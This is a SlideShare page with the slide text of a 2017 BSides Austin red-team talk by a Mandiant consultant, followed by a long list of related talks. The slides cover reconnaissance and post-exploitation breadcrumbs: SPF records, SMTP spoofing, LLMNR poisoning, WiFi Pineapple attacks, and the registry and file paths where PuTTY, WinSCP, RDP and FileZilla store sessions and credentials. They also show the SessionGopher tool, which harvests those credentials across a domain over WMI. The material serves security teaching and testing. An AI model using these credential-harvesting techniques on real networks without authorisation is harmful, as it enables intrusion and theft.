SlideShare a Scribd company logo

Breadcrumbs to Loaves: BSides Austin '17

Download as PPTX, PDF
Brandon Arvanaghi
Brandon Arvanaghi

Breadcrumbs to Loaves: How tidbits of Information Lead Us to Full-Scale Compromise. Presented at BSides Austin 2017. Follow on Twitter: @arvanaghi Often on red teams, there is no obvious path to compromising the environment. Reconnaissance efforts, both external and internal, may yield only crumbs of information. Though tiny and often in obscure locations, these bits of information can serve as a trail of breadcrumbs to full-scale compromise. Specific keys in the Windows Registry and unusual sources of open-source intelligence gathering can provide valuable information about a network mapping that most companies don’t know exist. We walk you step-by-step through what some of these crumbs are, how to find them, and how we have used tiny bits of information to escalate our privileges to full-scale enterprise compromise.

Technology
1 of 53
Copyright © FireEye, Inc. All rights reserved.1 Brandon Arvanaghi @arvanaghi Breadcrumbs to LoavesHow Tidbits of Information Lead Us to Full-Scale Compromise
Copyright © FireEye, Inc. All rights reserved.2 Brandon Arvanaghi (@arvanaghi) • Security Consultant at Mandiant • Webshell detection, post-exploitation, sandbox detection tools • Researched automated attack plan generation at Vanderbilt University
Copyright © FireEye, Inc. All rights reserved.3 Breadcrumbs • Small, seemingly benign or irrelevant pieces of information that can lead to major exploitation • Types of breadcrumbs: • Open Source Intelligence Gathering (OSINT)/External • Wireless • Internal (physical connection connection) • Post-exploitation – Bulk of Talk • SessionGopher – tool I developed to discover Unix systems and jump boxes https://github.com/fireeye/SessionGopher
Copyright © FireEye, Inc. All rights reserved.4 OSINT/EXTERNAL BREADCRUMBS
Copyright © FireEye, Inc. All rights reserved.5 Crumb #1: SPF Records • Sender Policy Framework • You own example.com • Problem: Spoofing emails from @example.com is easily done by creating a mail server and modifying headers • Solution: SPF record at example.com’s DNS zone. Says “you should only see emails from @example.com from the following IP addresses: ….” • Recipients now automatically check with example.com’s DNS servers if email’s source IP is in SPF record
Copyright © FireEye, Inc. All rights reserved.6 Crumb #1: SPF Records • As an attacker, SPF records provide insight into third parties • Sometimes, companies want third parties to be able to send mail on their behalf • E.g. example of LinkedIn trusting DocuSign to send emails from https://community.rapid7.com/community/infosec/blog/2015/02/23/osint-through-sender-policy-framework-spf- records • https://hackertarget.com/quietly-mapping-the-network-attack-surface/
Copyright © FireEye, Inc. All rights reserved.7 Crumb #2: Subsidiaries • Company only as strong as its weakest link • Mergers and Acquisitions • Due diligence • Cyber insurance
Copyright © FireEye, Inc. All rights reserved.8
Crumb #3: Unauthenticated SMTP Server • If port 25 (SMTP) is open on a remote host, you may be able to send unauthenticated mail from that server to internal employees • Without authentication, you can spoof any internal email address! http://stackoverflow.com/questions/11046135/how-to-send-email-using-simple-smtp- commands-via-gmail
Copyright © FireEye, Inc. All rights reserved.12 INTERNAL BREADCRUMBS
Copyright © FireEye, Inc. All rights reserved.13 Crumb #1: LLMNR • LLMNR = Link-Local Multicast Name Resolution • Hosts on the same link (subnet) can resolve DNS queries, as opposed to just relying on DNS server • Peer-to-peer, decentralized • Fast • Multicast • Implicitly trust everyone • Responder by SpiderLabs
Unicast Example I’m a PC DNSStandard DNS query
Unicast Example DNS 10.0.30.15 Standard DNS query 10.0.30.15 Great! I’m coming to: I’m a PC
Unicast Example DNS 10.0.30.15 Standard DNS query 10.0.30.15 ✅I’m a PC
Multicast Example LLMNR Hi everyone! Where’s confluence.corp.com? That’s me! 10.1.40.15, come over! 10.1.40.15 I’m a PC
Multicast Example LLMNR 10.1.40.15 I’m a PC 10.1.40.15 Great! I’m coming to:
Multicast Example LLMNR 10.1.40.15 I’m a PC 10.1.40.15
Copyright © FireEye, Inc. All rights reserved.20 Crumb #2: IT HelpDesk/Intranet • Company helpdesk sites often lack authentication • Real examples from engagements: • “Our point of sale terminals can be accessed from Win7-Client1, Win7-Client2, and Win7-Client3” • Excel file storing Unix system passwords
Copyright © FireEye, Inc. All rights reserved.21 Crumb #2: IT HelpDesk/Intranet 1. Nmap scan across subnets 2. Run EyeWitness by Christopher Truncer
Copyright © FireEye, Inc. All rights reserved.22 Crumb #3: Anonymous Shares • Publically available shared folders that do not require any form of authentication • Often out of perceived necessity • Contractors, vendors • Result: plaintext password files
Copyright © FireEye, Inc. All rights reserved.23 Crumb #4: When Hostnames Make Sense • Use PowerView or ADExplorer to get lists of hostnames • Nonintrusive way to understand the role of each system without doing Nmap scans • SQLWIN7.CORP.COM • MAIL01.CORP.COM • MEDIA-BKUP.CORP.COM
Copyright © FireEye, Inc. All rights reserved.24 WIRELESS BREADCRUMBS
Copyright © FireEye, Inc. All rights reserved.25 Crumb #1: Guest Network Host Visibility • Guest networks should be segregated. This is not always done properly. • Visible hosts with visible services can lead to lateral movement onto corporate network • Pivot!
Copyright © FireEye, Inc. All rights reserved.26 Crumb #2: Remembered Networks • Your device probes for every single access point it remembers having associated • Yells out known SSID names indiscriminately • WiFi Pineapple responds any probe, automatically connecting you • Direct your traffic to internet while reading all unencrypted traffic • Quietly changing HTTPS requests to HTTP
Copyright © FireEye, Inc. All rights reserved.27 Remembered Networks: Real Mandiant Engagement
Copyright © FireEye, Inc. All rights reserved.28 Remembered Networks: Real Mandiant Engagement
Copyright © FireEye, Inc. All rights reserved.29 Remembered Networks: Real Mandiant Engagement associated!
Copyright © FireEye, Inc. All rights reserved.30 Remembered Networks: Real Mandiant Engagement associated! Visible to two different networks PsExec, WMIExec, etc.
31
Copyright © FireEye, Inc. All rights reserved.32 POST-EXPLOITATION SessionGopher: Finding Unix Systems and Jump Boxes https://github.com/fireeye/SessionGopher
Copyright © FireEye, Inc. All rights reserved.33 The Registry • On many engagements, consultants are tasked with exploiting Unix systems • Intellectual property on Macbook Pros • Point of sale terminals running Linux • Etc. • Often not domain-joined! • Would be so much easier if they were • Use PowerView • How can we find & exploit them?
Copyright © FireEye, Inc. All rights reserved.34 The Registry • Current methodology 1. Nmap for live hosts not found in Active Directory a. Open Unix ports 2. netstat domain-joined systems, look for active connections over Unix ports 3. Search Active Directory for groups like “Linux Admins” & “Mac Admins” a. Find their members’ workstations, active sessions • Methodology relies on luck and active sessions. Better way?
Copyright © FireEye, Inc. All rights reserved.35 The Registry • HKEY_USERS • Persistent storage of saved session for any user who has logged in! • Users don’t have to be currently logged in • Though Unix systems not domain-joined, they are often managed by domain-joined Windows systems • Valuable artifacts on these hosts • Solves our “active session” problem • But what can we find in this magical hive that helps us exploit Unix systems?
Copyright © FireEye, Inc. All rights reserved.36 The Registry
Copyright © FireEye, Inc. All rights reserved.37 Solution 1. Find artifacts left by tools typically used to access Unix systems. 2. If they exist, then saved sessions might exist. Extract ’em.
Copyright © FireEye, Inc. All rights reserved.38 Tools • WinSCP • FileZilla • PuTTY • SuperPuTTY • VNC • RDP • More!
Copyright © FireEye, Inc. All rights reserved.39 Paths to Sessions Stored in Registry • PuTTY • HKEY_USERS<SID>SOFTWARESimonTathamPuTTYSessions • WinSCP • HKEY_USERS<SID>SOFTWAREMartin PrikrylWinSCP 2Sessions • Microsoft Remote Desktop • HKEY_USERS<SID> SOFTWAREMicrosoftTerminal Server ClientServers Non-registry (assumes filename/location unchanged) • FileZilla • <Drive>:Users<Username>AppDataRoamingFileZillasitemanager.xml • SuperPuTTY • <Drive>:Users<Username>DocumentsSuperPuTTYSessions.xml
Copyright © FireEye, Inc. All rights reserved.40 WinSCP HKEY_USERS<SID>SoftwareMartin PrikrylWinSCP 2Sessions<SessionName> HKEY_USERS<SID>SoftwareMartin PrikrylWinSCP 2ConfigurationSecurity
Copyright © FireEye, Inc. All rights reserved.41
Copyright © FireEye, Inc. All rights reserved.42 WinSCP
Copyright © FireEye, Inc. All rights reserved.43 Paths to Sessions • HKEY_USERS<SID>SOFTWAREMicrosoftTerminal Server ClientDefault • HKEY_USERS<SID>SOFTWAREMicrosoftTerminal Server ClientDefault
Copyright © FireEye, Inc. All rights reserved.44 FileZilla <Drive>:Users<Username>AppDataRoamingFileZillaSiteManager.xml
Copyright © FireEye, Inc. All rights reserved.45 SuperPuTTY <Drive>:Users<Username>DocumentsSuperPuTTYSessions.xml • ExtraArgs field can contain plaintext password
Copyright © FireEye, Inc. All rights reserved.46 PuTTY .ppk Files • One-click PuTTY logins • Key can be plaintext (as in here) or encrypted
Copyright © FireEye, Inc. All rights reserved.47 Microsoft .rdp Files • Executable, can be read by dragging into text editor • Plethora of arguments, many optional • Host, if admin, prompt for credentials, etc. • Fieldname:TypeOfField:Value • TypeOfField = Integer or String
Copyright © FireEye, Inc. All rights reserved.48
Copyright © FireEye, Inc. All rights reserved.49
Copyright © FireEye, Inc. All rights reserved.50 Windows Management Instrumentation (WMI) • Rather than running SessionGopher on each computer (impractical), we can use WMI • Built-in “Invoke-WmiMethod” command in PowerShell • Remote registry querying ability
Copyright © FireEye, Inc. All rights reserved.51
Copyright © FireEye, Inc. All rights reserved.52 Write to CSV (Invoke-SessionGopher –o) • Create a physical mapping of the network • Aggregate all session data across entire domain or targeted computers • Essentially, see the physical infrastructure of network!
Copyright © FireEye, Inc. All rights reserved.53 QUESTIONS? Twitter: @arvanaghi Github: https://github.com/fireeye/SessionGopher Brandon Arvanaghi

Recommended

CheckPlease - Payload-Agnostic Implant Security
CheckPlease - Payload-Agnostic Implant SecurityCheckPlease - Payload-Agnostic Implant Security
CheckPlease - Payload-Agnostic Implant SecurityBrandon Arvanaghi
 
BSides_Charm2015_Info sec hunters_gathers
BSides_Charm2015_Info sec hunters_gathersBSides_Charm2015_Info sec hunters_gathers
BSides_Charm2015_Info sec hunters_gathersAndrew McNicol
 
Outlook and Exchange for the bad guys
Outlook and Exchange for the bad guysOutlook and Exchange for the bad guys
Outlook and Exchange for the bad guysNick Landers
 
Introduction to Penetration Testing
Introduction to Penetration TestingIntroduction to Penetration Testing
Introduction to Penetration TestingAndrew McNicol
 
Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...
Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...
Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...grecsl
 
BSides Philly Finding a Company's BreakPoint
BSides Philly Finding a Company's BreakPointBSides Philly Finding a Company's BreakPoint
BSides Philly Finding a Company's BreakPointAndrew McNicol
 
Tcpdump hunter
Tcpdump hunterTcpdump hunter
Tcpdump hunterAndrew McNicol
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operationsSunny Neo
 

Recommended

CheckPlease - Payload-Agnostic Implant Security
CheckPlease - Payload-Agnostic Implant SecurityCheckPlease - Payload-Agnostic Implant Security
CheckPlease - Payload-Agnostic Implant SecurityBrandon Arvanaghi
 
BSides_Charm2015_Info sec hunters_gathers
BSides_Charm2015_Info sec hunters_gathersBSides_Charm2015_Info sec hunters_gathers
BSides_Charm2015_Info sec hunters_gathersAndrew McNicol
 
Outlook and Exchange for the bad guys
Outlook and Exchange for the bad guysOutlook and Exchange for the bad guys
Outlook and Exchange for the bad guysNick Landers
 
Introduction to Penetration Testing
Introduction to Penetration TestingIntroduction to Penetration Testing
Introduction to Penetration TestingAndrew McNicol
 
Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...
Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...
Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...grecsl
 
BSides Philly Finding a Company's BreakPoint
BSides Philly Finding a Company's BreakPointBSides Philly Finding a Company's BreakPoint
BSides Philly Finding a Company's BreakPointAndrew McNicol
 
Tcpdump hunter
Tcpdump hunterTcpdump hunter
Tcpdump hunterAndrew McNicol
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operationsSunny Neo
 
Malware Analysis Made Simple
Malware Analysis Made SimpleMalware Analysis Made Simple
Malware Analysis Made SimplePaul Melson
 
Beyond Automated Testing - RVAsec 2016
Beyond Automated Testing - RVAsec 2016Beyond Automated Testing - RVAsec 2016
Beyond Automated Testing - RVAsec 2016Andrew McNicol
 
Malware Analysis 101 - N00b to Ninja in 60 Minutes at Notacon on April 12, 2014
Malware Analysis 101 - N00b to Ninja in 60 Minutes at Notacon on April 12, 2014Malware Analysis 101 - N00b to Ninja in 60 Minutes at Notacon on April 12, 2014
Malware Analysis 101 - N00b to Ninja in 60 Minutes at Notacon on April 12, 2014grecsl
 
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...CODE BLUE
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemRoss Wolf
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class Chris Gates
 
Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Daniel Bohannon
 
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwareDefcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwarePriyanka Aash
 
Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0marcioalma
 
Web security for developers
Web security for developersWeb security for developers
Web security for developersSunny Neo
 
Sticky Keys to the Kingdom
Sticky Keys to the KingdomSticky Keys to the Kingdom
Sticky Keys to the KingdomDennis Maldonado
 
Entomology 101
Entomology 101Entomology 101
Entomology 101snyff
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysJoff Thyer
 
TeelTech - Advancing Mobile Device Forensics (online version)
TeelTech - Advancing Mobile Device Forensics (online version)TeelTech - Advancing Mobile Device Forensics (online version)
TeelTech - Advancing Mobile Device Forensics (online version)Mike Felch
 
BSides London 2017 - Hunt Or Be Hunted
BSides London 2017 - Hunt Or Be HuntedBSides London 2017 - Hunt Or Be Hunted
BSides London 2017 - Hunt Or Be HuntedAlex Davies
 
Defcon 22-paul-mcmillan-attacking-the-iot-using-timing-attac
Defcon 22-paul-mcmillan-attacking-the-iot-using-timing-attacDefcon 22-paul-mcmillan-attacking-the-iot-using-timing-attac
Defcon 22-paul-mcmillan-attacking-the-iot-using-timing-attacPriyanka Aash
 
Defcon 22-philip-young-from-root-to-special-hacking-ibm-main
Defcon 22-philip-young-from-root-to-special-hacking-ibm-mainDefcon 22-philip-young-from-root-to-special-hacking-ibm-main
Defcon 22-philip-young-from-root-to-special-hacking-ibm-mainPriyanka Aash
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliPriyanka Aash
 
Offensive Python for Pentesting
Offensive Python for PentestingOffensive Python for Pentesting
Offensive Python for PentestingMike Felch
 
1000 to 0
1000 to 01000 to 0
1000 to 0Sunny Neo
 
Ultimate pen test compromising a highly secure environment (nikhil)
Ultimate pen test compromising a highly secure environment (nikhil)Ultimate pen test compromising a highly secure environment (nikhil)
Ultimate pen test compromising a highly secure environment (nikhil)ClubHack
 
Socially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front DoorSocially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front DoorMike Felch
 

More Related Content

What's hot

Malware Analysis Made Simple
Malware Analysis Made SimpleMalware Analysis Made Simple
Malware Analysis Made SimplePaul Melson
 
Beyond Automated Testing - RVAsec 2016
Beyond Automated Testing - RVAsec 2016Beyond Automated Testing - RVAsec 2016
Beyond Automated Testing - RVAsec 2016Andrew McNicol
 
Malware Analysis 101 - N00b to Ninja in 60 Minutes at Notacon on April 12, 2014
Malware Analysis 101 - N00b to Ninja in 60 Minutes at Notacon on April 12, 2014Malware Analysis 101 - N00b to Ninja in 60 Minutes at Notacon on April 12, 2014
Malware Analysis 101 - N00b to Ninja in 60 Minutes at Notacon on April 12, 2014grecsl
 
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...CODE BLUE
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemRoss Wolf
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class Chris Gates
 
Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Daniel Bohannon
 
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwareDefcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwarePriyanka Aash
 
Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0marcioalma
 
Web security for developers
Web security for developersWeb security for developers
Web security for developersSunny Neo
 
Sticky Keys to the Kingdom
Sticky Keys to the KingdomSticky Keys to the Kingdom
Sticky Keys to the KingdomDennis Maldonado
 
Entomology 101
Entomology 101Entomology 101
Entomology 101snyff
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysJoff Thyer
 
TeelTech - Advancing Mobile Device Forensics (online version)
TeelTech - Advancing Mobile Device Forensics (online version)TeelTech - Advancing Mobile Device Forensics (online version)
TeelTech - Advancing Mobile Device Forensics (online version)Mike Felch
 
BSides London 2017 - Hunt Or Be Hunted
BSides London 2017 - Hunt Or Be HuntedBSides London 2017 - Hunt Or Be Hunted
BSides London 2017 - Hunt Or Be HuntedAlex Davies
 
Defcon 22-paul-mcmillan-attacking-the-iot-using-timing-attac
Defcon 22-paul-mcmillan-attacking-the-iot-using-timing-attacDefcon 22-paul-mcmillan-attacking-the-iot-using-timing-attac
Defcon 22-paul-mcmillan-attacking-the-iot-using-timing-attacPriyanka Aash
 
Defcon 22-philip-young-from-root-to-special-hacking-ibm-main
Defcon 22-philip-young-from-root-to-special-hacking-ibm-mainDefcon 22-philip-young-from-root-to-special-hacking-ibm-main
Defcon 22-philip-young-from-root-to-special-hacking-ibm-mainPriyanka Aash
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliPriyanka Aash
 
Offensive Python for Pentesting
Offensive Python for PentestingOffensive Python for Pentesting
Offensive Python for PentestingMike Felch
 

What's hot (20)

Malware Analysis Made Simple
Malware Analysis Made SimpleMalware Analysis Made Simple
Malware Analysis Made Simple
 
Beyond Automated Testing - RVAsec 2016
Beyond Automated Testing - RVAsec 2016Beyond Automated Testing - RVAsec 2016
Beyond Automated Testing - RVAsec 2016
 
Malware Analysis 101 - N00b to Ninja in 60 Minutes at Notacon on April 12, 2014
Malware Analysis 101 - N00b to Ninja in 60 Minutes at Notacon on April 12, 2014Malware Analysis 101 - N00b to Ninja in 60 Minutes at Notacon on April 12, 2014
Malware Analysis 101 - N00b to Ninja in 60 Minutes at Notacon on April 12, 2014
 
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find Them
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
 
Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016
 
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwareDefcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
 
Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0
 
Web security for developers
Web security for developersWeb security for developers
Web security for developers
 
Sticky Keys to the Kingdom
Sticky Keys to the KingdomSticky Keys to the Kingdom
Sticky Keys to the Kingdom
 
Entomology 101
Entomology 101Entomology 101
Entomology 101
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
 
TeelTech - Advancing Mobile Device Forensics (online version)
TeelTech - Advancing Mobile Device Forensics (online version)TeelTech - Advancing Mobile Device Forensics (online version)
TeelTech - Advancing Mobile Device Forensics (online version)
 
BSides London 2017 - Hunt Or Be Hunted
BSides London 2017 - Hunt Or Be HuntedBSides London 2017 - Hunt Or Be Hunted
BSides London 2017 - Hunt Or Be Hunted
 
Defcon 22-paul-mcmillan-attacking-the-iot-using-timing-attac
Defcon 22-paul-mcmillan-attacking-the-iot-using-timing-attacDefcon 22-paul-mcmillan-attacking-the-iot-using-timing-attac
Defcon 22-paul-mcmillan-attacking-the-iot-using-timing-attac
 
Defcon 22-philip-young-from-root-to-special-hacking-ibm-main
Defcon 22-philip-young-from-root-to-special-hacking-ibm-mainDefcon 22-philip-young-from-root-to-special-hacking-ibm-main
Defcon 22-philip-young-from-root-to-special-hacking-ibm-main
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
 
Offensive Python for Pentesting
Offensive Python for PentestingOffensive Python for Pentesting
Offensive Python for Pentesting
 
1000 to 0
1000 to 01000 to 0
1000 to 0
 

Similar to Breadcrumbs to Loaves: BSides Austin '17

Ultimate pen test compromising a highly secure environment (nikhil)
Ultimate pen test compromising a highly secure environment (nikhil)Ultimate pen test compromising a highly secure environment (nikhil)
Ultimate pen test compromising a highly secure environment (nikhil)ClubHack
 
Socially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front DoorSocially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front DoorMike Felch
 
Defcon 25 Packet Hacking Village - Finding Your Way to Domain Access
Defcon 25 Packet Hacking Village - Finding Your Way to Domain AccessDefcon 25 Packet Hacking Village - Finding Your Way to Domain Access
Defcon 25 Packet Hacking Village - Finding Your Way to Domain Accesseightbit
 
Nomura UCCSC 2009
Nomura UCCSC 2009Nomura UCCSC 2009
Nomura UCCSC 2009dnomura
 
Pentest Apocalypse - SANSFIRE 2016 Edition
Pentest Apocalypse - SANSFIRE 2016 EditionPentest Apocalypse - SANSFIRE 2016 Edition
Pentest Apocalypse - SANSFIRE 2016 EditionBeau Bullock
 
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINEPENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINEChris Gates
 
Workshop on Network Security
Workshop on Network SecurityWorkshop on Network Security
Workshop on Network SecurityUC San Diego
 
Pro Tips for Power Users – Palo Alto Networks Live Community and Fuel User Gr...
Pro Tips for Power Users – Palo Alto Networks Live Community and Fuel User Gr...Pro Tips for Power Users – Palo Alto Networks Live Community and Fuel User Gr...
Pro Tips for Power Users – Palo Alto Networks Live Community and Fuel User Gr...PaloAltoNetworks
 
Top 10 Threats to Cloud Security
Top 10 Threats to Cloud SecurityTop 10 Threats to Cloud Security
Top 10 Threats to Cloud SecuritySBWebinars
 
Crypto Miners in the Cloud
Crypto Miners in the CloudCrypto Miners in the Cloud
Crypto Miners in the CloudTeri Radichel
 
Creating a fortress in your active directory environment
Creating a fortress in your active directory environmentCreating a fortress in your active directory environment
Creating a fortress in your active directory environmentDavid Rowe
 
unit 2 confinement techniques.pdf
unit 2 confinement techniques.pdfunit 2 confinement techniques.pdf
unit 2 confinement techniques.pdfRohitGautam261127
 
Lannguyen-Detecting Cyber Attacks
Lannguyen-Detecting Cyber AttacksLannguyen-Detecting Cyber Attacks
Lannguyen-Detecting Cyber AttacksSecurity Bootcamp
 
What Does a Full Featured Security Strategy Look Like?
What Does a Full Featured Security Strategy Look Like?What Does a Full Featured Security Strategy Look Like?
What Does a Full Featured Security Strategy Look Like?Precisely
 
Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)ClubHack
 
Dafgjgghhghfhjgghjhgy06-Footprinting.pptx
Dafgjgghhghfhjgghjhgy06-Footprinting.pptxDafgjgghhghfhjgghjhgy06-Footprinting.pptx
Dafgjgghhghfhjgghjhgy06-Footprinting.pptxAlfredObia1
 
UKC - Feb 2013 - Analyzing the security of Windows 7 and Linux for cloud comp...
UKC - Feb 2013 - Analyzing the security of Windows 7 and Linux for cloud comp...UKC - Feb 2013 - Analyzing the security of Windows 7 and Linux for cloud comp...
UKC - Feb 2013 - Analyzing the security of Windows 7 and Linux for cloud comp...Vincent Giersch
 
Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...B.A.
 

Similar to Breadcrumbs to Loaves: BSides Austin '17 (20)

Ultimate pen test compromising a highly secure environment (nikhil)
Ultimate pen test compromising a highly secure environment (nikhil)Ultimate pen test compromising a highly secure environment (nikhil)
Ultimate pen test compromising a highly secure environment (nikhil)
 
Socially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front DoorSocially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front Door
 
Defcon 25 Packet Hacking Village - Finding Your Way to Domain Access
Defcon 25 Packet Hacking Village - Finding Your Way to Domain AccessDefcon 25 Packet Hacking Village - Finding Your Way to Domain Access
Defcon 25 Packet Hacking Village - Finding Your Way to Domain Access
 
Botnets Attacks.pptx
Botnets Attacks.pptxBotnets Attacks.pptx
Botnets Attacks.pptx
 
Nomura UCCSC 2009
Nomura UCCSC 2009Nomura UCCSC 2009
Nomura UCCSC 2009
 
Pentest Apocalypse - SANSFIRE 2016 Edition
Pentest Apocalypse - SANSFIRE 2016 EditionPentest Apocalypse - SANSFIRE 2016 Edition
Pentest Apocalypse - SANSFIRE 2016 Edition
 
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINEPENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
 
Workshop on Network Security
Workshop on Network SecurityWorkshop on Network Security
Workshop on Network Security
 
Pro Tips for Power Users – Palo Alto Networks Live Community and Fuel User Gr...
Pro Tips for Power Users – Palo Alto Networks Live Community and Fuel User Gr...Pro Tips for Power Users – Palo Alto Networks Live Community and Fuel User Gr...
Pro Tips for Power Users – Palo Alto Networks Live Community and Fuel User Gr...
 
Top 10 Threats to Cloud Security
Top 10 Threats to Cloud SecurityTop 10 Threats to Cloud Security
Top 10 Threats to Cloud Security
 
Crypto Miners in the Cloud
Crypto Miners in the CloudCrypto Miners in the Cloud
Crypto Miners in the Cloud
 
Creating a fortress in your active directory environment
Creating a fortress in your active directory environmentCreating a fortress in your active directory environment
Creating a fortress in your active directory environment
 
unit 2 confinement techniques.pdf
unit 2 confinement techniques.pdfunit 2 confinement techniques.pdf
unit 2 confinement techniques.pdf
 
Lannguyen-Detecting Cyber Attacks
Lannguyen-Detecting Cyber AttacksLannguyen-Detecting Cyber Attacks
Lannguyen-Detecting Cyber Attacks
 
What Does a Full Featured Security Strategy Look Like?
What Does a Full Featured Security Strategy Look Like?What Does a Full Featured Security Strategy Look Like?
What Does a Full Featured Security Strategy Look Like?
 
